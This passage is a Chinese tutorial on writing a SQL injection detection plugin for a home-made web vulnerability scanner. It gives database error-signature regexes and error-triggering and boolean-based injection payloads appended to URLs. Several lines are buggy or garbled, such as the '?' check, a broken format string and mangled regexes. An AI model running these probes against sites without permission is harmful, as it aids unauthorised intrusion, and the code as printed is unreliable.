项目目录结构
/w8ay.py //项目启动主文件
/lib/core //核心文件存放目录
/lib/core/config.py //配置文件
/script //插件存放
/exp //exp和poc存放
四、实验步骤
4.1 sql检测脚本编写
用一个字典存储数据库特征:
DBMS_ERRORS = { # regular expressions used for DBMS recognition based on error message response
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*Wpg_.*", r"valid PostgreSQL result", r"Npgsql."),
"Microsoft SQL Server": (r"Driver.* SQL[-\_ ]*Server", r"OLE DB.* SQL Server", r"(W|A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(W|A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*WSystem.Data.SqlClient.", r"(?s)Exception.*WRoadhouse.Cms."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*Woci_.*", r"Warning.*Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_w+("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"[SQLITE_ERROR]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
通过正则,如果发现我们的正则语句,就可以判断出是哪个数据库了。
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if(re.search(regex,_content)):
return True
这个是我们的测试语句[payload]。
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
用报错语句返回正确的内容和错误的内容进行对比。
for test_payload in BOOLEAN_TESTS:
#正确的网页
RANDINT = random.randint(1, 255)
_url = url + test_payload%(RANDINT,RANDINT)
content["true"] = Downloader.get(_url)
_url = url + test_payload%(RANDINT,RANDINT+1)
content["false"] = Downloader.get(_url)
if content["origin"]==content["true"]!=content["false"]:
return "sql fonud: %"%url
这一句:
content["origin"]==content["true"]!=content["false"]
意思就是当原始的网页等于正确的网页不等于错误的网页内容时就可以判定这个地址存在注入漏洞。
完整代码:
import re,random
from lib.core import Download
def sqlcheck(url):
if(not url.find("?")):
return False
Downloader = Download.Downloader()
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
DBMS_ERRORS = {# regular expressions used for DBMS recognition based on error message response
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*Wpg_.*", r"valid PostgreSQL result", r"Npgsql."),
"Microsoft SQL Server": (r"Driver.* SQL[-\_ ]*Server", r"OLE DB.* SQL Server", r"(W|A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(W|A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*WSystem.Data.SqlClient.", r"(?s)Exception.*WRoadhouse.Cms."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*Woci_.*", r"Warning.*Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_w+("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"[SQLITE_ERROR]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
_url = url + "%29%28%22%27"
_content = Downloader.get(_url)
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if(re.search(regex,_content)):
return True
content = {}
content["origin"] = Downloader.get(_url)
for test_payload in BOOLEAN_TESTS:
RANDINT = random.randint(1, 255)
_url = url + test_payload%(RANDINT,RANDINT)
content["true"] = Downloader.get(_url)
_url = url + test_payload%(RANDINT,RANDINT+1)
content["false"] = Downloader.get(_url)
if content["origin"]==content["true"]!=content["false"]:
return "sql fonud: %"%url
我们在/script目录中创建这个文件,命名为sqlcheck.py。 暂时我们可以把他作为一个模块单独的进行调用,等以后写完插件系统后可由插件系统自动的调用这些模块。
有些url地址是我们不需要测试的,比如.html结尾的地址,我们可以过滤掉他们,这里我直接find("?")查找?来判断url是否符合我们的标准。